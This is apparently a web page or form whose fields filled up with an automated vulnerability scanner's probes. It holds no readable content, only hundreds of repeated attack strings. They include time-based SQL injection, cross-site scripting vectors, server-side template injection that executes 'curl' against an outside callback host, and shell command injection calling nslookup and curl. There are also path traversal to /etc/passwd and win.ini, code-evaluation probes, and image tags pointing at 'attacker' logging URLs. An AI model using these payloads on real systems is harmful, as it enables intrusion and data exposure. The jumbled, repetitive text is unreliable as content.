-1 waitfor delay '0:0:15' --
<a HrEF=http://xss.bxss.me></a>


<a HrEF=jaVaScRiPT:>

gZN3TVim'; waitfor delay '0:0:15' --

}body{zzz:Expre/**/SSion(02e4(9816))}
redirtest.acx
https://datemarketplace.softpos-ksa.com/



<WVE2GR>UC8FR[!+!]</WVE2GR>



<ifRAme sRc=9086.com></IfRamE>
"+"A".concat(70-3).concat(22*4).concat(107).concat(65).concat(102).concat(65)+(require"socket"
Socket.gethostbyname("hitel"+"jplayhbo126de.bxss.me.")[3].to_s)+"

7xEJ4Nh2'); waitfor delay '0:0:15' --
'+'A'.concat(70-3).concat(22*4).concat(105).concat(90).concat(108).concat(87)+(require'socket'
Socket.gethostbyname('hitvd'+'iozvheake7bd1.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(98).concat(70).concat(109).concat(76)+(require'socket'
Socket.gethostbyname('hitsv'+'zjjhvgave80e6.bxss.me.')[3].to_s)



<afjXmnE x=9315>



<esi:include src="http://bxss.me/rpb.png"/>



<img sRc='http://attacker-9117/log.php?

rPE5eIBa')); waitfor delay '0:0:15' --





<a28TWAx<
'.gethostbyname(lc('hitvm'.'bfejqfsdc9dbf.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(67).chr(112).chr(75).'
".gethostbyname(lc("hiton"."rlazikxec99ea.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(90).chr(100).chr(84)."
gethostbyname(lc('hitwt'.'sblrshdr7ae1b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(71).chr(99).chr(68)








;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
'.print(md5(31337)).'










ctime
sleep
p0
(I30
tp1
Rp2
.
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00













'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'



'"



%C0%A7%C0%A2%2527%2522\'\"
@@wSuK0
(select 198766*667891)
(select 198766*667891 from DUAL)














about-nopcommerce


'"()
about-nopcommerce/.

'&&sleep(27*1000)*czqlmw&&'



"&&sleep(27*1000)*zzagqx&&"

'||sleep(27*1000)*ghmzcf||'



"||sleep(27*1000)*hajlbx||"
















http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg



&n980835=v918941
/etc/shells






../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
Http://bxss.me/t/fit.txt


http://bxss.me/t/fit.txt?.jpg






























)


!(()&&!|*|*|


^(#$!@#$)(()))******






















{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjgnrnlxxde79ed.bxss.me")}}












5559947143


















555






555




















































{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitywikahezjc613f4.bxss.me")}}
555
5559743071
555
555
bfg2532<s1﹥s2ʺs3ʹhjl2532
555
bfgx1247%C0%BEz1%C0%BCz2a%90bcxhjl1247
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<WCEKOS>X5WXC[!+!]</WCEKOS>
555
555
555<isindex type=image src=1 onerror=MM8F(9132)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9154'>
555
555<body onload=MM8F(9030)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=MM8F(9488)>
555
555<img src=xyz OnErRor=MM8F(9364)>
555
555<img/src=">" onerror=alert(9868)>
555
%F6<img zzz onmouseover=MM8F(96011) //%F6>
555
555<input autofocus onfocus=MM8F(9997)>
555
<a HrEF=http://xss.bxss.me></a>
555
555
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(MM8F(9579))}
555
555<WA0HXD>TYBWR[!+!]</WA0HXD>
555
555
555<ifRAme sRc=9374.com></IfRamE>
555
555<aKubyh5 x=9754>
555
555<img sRc='http://attacker-9664/log.php?
555<aVEzJyb<
1BFDFZ5CXV20
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me
'"
<!--
'"
%C0%A7%C0%A2%2527%2522\'\"
@@pGciQ
(select 198766*667891)
(select 198766*667891 from DUAL)
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitqlzrxowbev1ee40.bxss.me")}}
response.write(9652520*9301798)
'+response.write(9652520*9301798)+'
"+response.write(9652520*9301798)+"
<% response.write(9652520*9301798) %>
9767704
+response.write(9652520*9301798)'
bfg9982<s1﹥s2ʺs3ʹhjl9982
bfgx1106%C0%BEz1%C0%BCz2a%90bcxhjl1106
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
imcZOBNd
Gf2Fc9is: XP0IVMAJ
<WYAS1E>YRZIN[!+!]</WYAS1E>
redirtest.acx
https://datemarketplace.softpos-ksa.com/
echo cetepc$()\ pkgtcg\nz^xyu||a #' &echo cetepc$()\ pkgtcg\nz^xyu||a #|" &echo cetepc$()\ pkgtcg\nz^xyu||a #
&echo abiljo$()\ zzxwjv\nz^xyu||a #' &echo abiljo$()\ zzxwjv\nz^xyu||a #|" &echo abiljo$()\ zzxwjv\nz^xyu||a #
<isindex type=image src=1 onerror=aRIB(9721)>
|echo jrvrdr$()\ itdfxa\nz^xyu||a #' |echo jrvrdr$()\ itdfxa\nz^xyu||a #|" |echo jrvrdr$()\ itdfxa\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
expr 9000646953 - 967437
(nslookup -q=cname hitgglsyqhemjfcc84.bxss.me||curl hitgglsyqhemjfcc84.bxss.me))
$(nslookup -q=cname hitmwvctkdlasf082f.bxss.me||curl hitmwvctkdlasf082f.bxss.me)
"+"A".concat(70-3).concat(22*4).concat(111).concat(67).concat(111).concat(65)+(require"socket"
Socket.gethostbyname("hitpd"+"bpkwctsk3aeb5.bxss.me.")[3].to_s)+"
../
&nslookup -q=cname hitrtwwutikgncd3c9.bxss.me&'\"`0&nslookup -q=cname hitrtwwutikgncd3c9.bxss.me&`'
'+'A'.concat(70-3).concat(22*4).concat(113).concat(67).concat(114).concat(65)+(require'socket'
Socket.gethostbyname('hitoj'+'mfzwwhunea114.bxss.me.')[3].to_s)+'
./
&(nslookup -q=cname hitgmffpukokved633.bxss.me||curl hitgmffpukokved633.bxss.me)&'\"`0&(nslookup -q=cname hitgmffpukokved633.bxss.me||curl hitgmffpukokved633.bxss.me)&`'
'A'.concat(70-3).concat(22*4).concat(113).concat(79).concat(113).concat(86)+(require'socket'
Socket.gethostbyname('hitqo'+'lgxgxsid72cba.bxss.me.')[3].to_s)
|(nslookup -q=cname hitngwpqzeacc70c5e.bxss.me||curl hitngwpqzeacc70c5e.bxss.me)
<esi:include src="http://bxss.me/rpb.png"/>
`(nslookup -q=cname hitnfxpaqrbhi621b8.bxss.me||curl hitnfxpaqrbhi621b8.bxss.me)`
;(nslookup -q=cname hitfnjbochtkvf2fa9.bxss.me||curl hitfnjbochtkvf2fa9.bxss.me)|(nslookup -q=cname hitfnjbochtkvf2fa9.bxss.me||curl hitfnjbochtkvf2fa9.bxss.me)&(nslookup -q=cname hitfnjbochtkvf2fa9.bxss.me||curl hitfnjbochtkvf2fa9.bxss.me)
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9506'>
<body onload=aRIB(9362)>
'.gethostbyname(lc('hitlh'.'opyjeycpaed42.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(86).chr(97).chr(75).'
".gethostbyname(lc("hitha"."jlwpdwkodf014.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(88).chr(109).chr(90)."
gethostbyname(lc('hitqu'.'cjctnjzqa807e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(73).chr(111).chr(75)
<img src=//xss.bxss.me/t/dot.gif onload=aRIB(9551)>
<img src=xyz OnErRor=aRIB(9397)>
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
'.print(md5(31337)).'
<img/src=">" onerror=alert(9448)>
%F6<img zzz onmouseover=aRIB(93671) //%F6>
ctime
sleep
p0
(I30
tp1
Rp2
.
<input autofocus onfocus=aRIB(9403)>
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
}body{zzz:Expre/**/SSion(aRIB(9744))}
<W1ALRP>I8C9E[!+!]</W1ALRP>
'"()
'&&sleep(27*1000)*kfpupv&&'
"&&sleep(27*1000)*ncuvzu&&"
'||sleep(27*1000)*yxglwg||'
<ifRAme sRc=9237.com></IfRamE>
"||sleep(27*1000)*qpornt||"
<al7el5g x=9414>
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
<img sRc='http://attacker-9891/log.php?
/etc/shells
&n945387=v910871
<afzVjoZ<
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
)
!(()&&!|*|*|
^(#$!@#$)(()))******
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitfabiaivbkq68fe6.bxss.me")}}
5559819673
bfg10224<s1﹥s2ʺs3ʹhjl10224
bfgx4458%C0%BEz1%C0%BCz2a%90bcxhjl4458
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555
555<W84QNM>MCSG3[!+!]</W84QNM>
555
555
555
555<isindex type=image src=1 onerror=E0cK(9083)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9277'>
555<body onload=E0cK(9041)>
555<img src=//xss.bxss.me/t/dot.gif onload=E0cK(9662)>
555<img src=xyz OnErRor=E0cK(9175)>
555
555<img/src=">" onerror=alert(9875)>
555
555
555
%F6<img zzz onmouseover=E0cK(94221) //%F6>
555
555<input autofocus onfocus=E0cK(9530)>
555
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(E0cK(9128))}
555
555
555<WR1RQL>AE2C5[!+!]</WR1RQL>
555
555<ifRAme sRc=9243.com></IfRamE>
555
555<ag0Dzmh x=9777>
555
555<img sRc='http://attacker-9032/log.php?
555
555<a8PDAYZ<
555
555
555






{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitqucrcuqjfb0a1a8.bxss.me")}}
555
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitimrcxjazew85d4c.bxss.me")}}
5559880784
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
9256980
bfg7625<s1﹥s2ʺs3ʹhjl7625
555


bfgx2924%C0%BEz1%C0%BCz2a%90bcxhjl2924
bfg7836<s1﹥s2ʺs3ʹhjl7836
xfs.bxss.me
555


'"
<!--
<%={{={@{#{${dfb}}%>


bfgx7671%C0%BEz1%C0%BCz2a%90bcxhjl7671


{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitupbhbburfwc445a.bxss.me")}}
<th:t="${dfb}#foreach
555


<%={{={@{#{${dfb}}%>

9706622
response.write(9181554*9096475)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
'+response.write(9181554*9096475)+'
"+response.write(9181554*9096475)+"


1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
<% response.write(9181554*9096475) %>
555
+response.write(9181554*9096475)'








<th:t="${dfb}#foreach
bfg4866<s1﹥s2ʺs3ʹhjl4866




555
dfb{{98991*97996}}xca
bfgx5959%C0%BEz1%C0%BCz2a%90bcxhjl5959


-1 OR 5*5=25 --
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
-1 OR 5*5=25
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
echo divhqf$()\ lqcpjv\nz^xyu||a #' &echo divhqf$()\ lqcpjv\nz^xyu||a #|" &echo divhqf$()\ lqcpjv\nz^xyu||a #
&echo fshwht$()\ vilaxm\nz^xyu||a #' &echo fshwht$()\ vilaxm\nz^xyu||a #|" &echo fshwht$()\ vilaxm\nz^xyu||a #
|echo zdvueh$()\ wamwbz\nz^xyu||a #' |echo zdvueh$()\ wamwbz\nz^xyu||a #|" |echo zdvueh$()\ wamwbz\nz^xyu||a #
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
expr 9000823916 - 949639
(nslookup -q=cname hithnlctkyybsabe3e.bxss.me||curl hithnlctkyybsabe3e.bxss.me))
$(nslookup -q=cname hittfpdsyeatwbb325.bxss.me||curl hittfpdsyeatwbb325.bxss.me)
&nslookup -q=cname hitshzshrpdgze9dca.bxss.me&'\"`0&nslookup -q=cname hitshzshrpdgze9dca.bxss.me&`'
&(nslookup -q=cname hitkuvtxjzwkb9c24d.bxss.me||curl hitkuvtxjzwkb9c24d.bxss.me)&'\"`0&(nslookup -q=cname hitkuvtxjzwkb9c24d.bxss.me||curl hitkuvtxjzwkb9c24d.bxss.me)&`'
dfb{{98991*97996}}xca
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
|(nslookup -q=cname hiteradjetpxq48f3e.bxss.me||curl hiteradjetpxq48f3e.bxss.me)
`(nslookup -q=cname hitifnecnotbn94151.bxss.me||curl hitifnecnotbn94151.bxss.me)`
;(nslookup -q=cname hitttsggwlwga530ef.bxss.me||curl hitttsggwlwga530ef.bxss.me)|(nslookup -q=cname hitttsggwlwga530ef.bxss.me||curl hitttsggwlwga530ef.bxss.me)&(nslookup -q=cname hitttsggwlwga530ef.bxss.me||curl hitttsggwlwga530ef.bxss.me)
if(now()=sysdate(),sleep(15),0)
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


555

<WSSHBU>MDALQ[!+!]</WSSHBU>


VclBvw5M
c8e7xhwV: 1Kpytvnk
555<WFYH7V>B3XRQ[!+!]</WFYH7V>






"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")











0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z







<isindex type=image src=1 onerror=Ngnw(9194)>


555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9877'>

-1; waitfor delay '0:0:15' --


<WAOMWP>ACZOY[!+!]</WAOMWP>

-1); waitfor delay '0:0:15' --

<body onload=Ngnw(9561)>

-1 waitfor delay '0:0:15' --

<img src=//xss.bxss.me/t/dot.gif onload=Ngnw(9944)>
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini

TOVOk81Y'; waitfor delay '0:0:15' --

<img src=xyz OnErRor=Ngnw(9213)>
file:///etc/passwd



UY14a38J'); waitfor delay '0:0:15' --
../





<img/src=">" onerror=alert(9723)>

PW4e2k2q')); waitfor delay '0:0:15' --








%F6<img zzz onmouseover=Ngnw(91571) //%F6>



'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'





'"

%C0%A7%C0%A2%2527%2522\'\"

<input autofocus onfocus=Ngnw(9868)>


redirtest.acx
@@fhgME
555<isindex type=image src=1 onerror=bIoB(9164)>
(select 198766*667891)
(select 198766*667891 from DUAL)
<a HrEF=http://xss.bxss.me></a>
https://datemarketplace.softpos-ksa.com/




555




<a HrEF=jaVaScRiPT:>







}body{zzz:Expre/**/SSion(Ngnw(9598))}
<isindex type=image src=1 onerror=BWTl(9204)>
555

<WL4TLL>LHVXO[!+!]</WL4TLL>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9092'>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9387'>

<ifRAme sRc=9392.com></IfRamE>
"+"A".concat(70-3).concat(22*4).concat(111).concat(74).concat(117).concat(84)+(require"socket"
Socket.gethostbyname("hitia"+"vwhltfng04036.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(115).concat(89).concat(120).concat(87)+(require'socket'
Socket.gethostbyname('hityl'+'tjthmdowa4b01.bxss.me.')[3].to_s)+'


'A'.concat(70-3).concat(22*4).concat(115).concat(79).concat(104).concat(71)+(require'socket'
Socket.gethostbyname('hiteb'+'lawcgedl1aa40.bxss.me.')[3].to_s)

<abG281e x=9227>



<esi:include src="http://bxss.me/rpb.png"/>








555


555<body onload=bIoB(9050)>



<img sRc='http://attacker-9972/log.php?
<body onload=BWTl(9366)>
'.gethostbyname(lc('hitwh'.'ckilvfej5e546.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(84).chr(114).chr(89).'


".gethostbyname(lc("hitta"."nmtymypg96263.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(72).chr(104).chr(77)."

<a5glwfd<
gethostbyname(lc('hithu'.'fneapqjbc899d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(80).chr(115).chr(78)






555


555<img src=//xss.bxss.me/t/dot.gif onload=bIoB(9169)>








<img src=//xss.bxss.me/t/dot.gif onload=BWTl(9918)>
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
ctime
sleep
p0
(I30
tp1
Rp2
.
555
";print(md5(31337));$a="
555<img src=xyz OnErRor=bIoB(9338)>


'.print(md5(31337)).'










<img src=xyz OnErRor=BWTl(9879)>
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555<img/src=">" onerror=alert(9402)>


555






















<img/src=">" onerror=alert(9037)>
'"()





'&&sleep(27*1000)*tfgkux&&'

"&&sleep(27*1000)*xwkrsr&&"

'||sleep(27*1000)*klqgfp||'

"||sleep(27*1000)*onpsob||"



&n907635=v923515












http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg


/etc/shells
555
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
%F6<img zzz onmouseover=bIoB(90761) //%F6>




bxss.me


Http://bxss.me/t/fit.txt
)


!(()&&!|*|*|
http://bxss.me/t/fit.txt?.jpg


^(#$!@#$)(()))******






















%F6<img zzz onmouseover=BWTl(95271) //%F6>


555
555<input autofocus onfocus=bIoB(9890)>




<a HrEF=http://xss.bxss.me></a>
<input autofocus onfocus=BWTl(9005)>


555


{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitxriihpkuwc921cb.bxss.me")}}
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>




555




5559666744
<a HrEF=jaVaScRiPT:>


555}body{zzz:Expre/**/SSion(bIoB(9238))}




555


555
}body{zzz:Expre/**/SSion(BWTl(9555))}










555<W462CV>EOQIB[!+!]</W462CV>




555


555
<WHTWY7>K4KT8[!+!]</WHTWY7>
555<ifRAme sRc=9643.com></IfRamE>






555
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitrmahnoosza7007c.bxss.me")}}
555<aLKDUvZ x=9041>
<ifRAme sRc=9613.com></IfRamE>




555


<aWi0R1L x=9211>


9382935
555<img sRc='http://attacker-9045/log.php?




<img sRc='http://attacker-9858/log.php?
555


555<a9hzmkS<


<asYa8qp<
555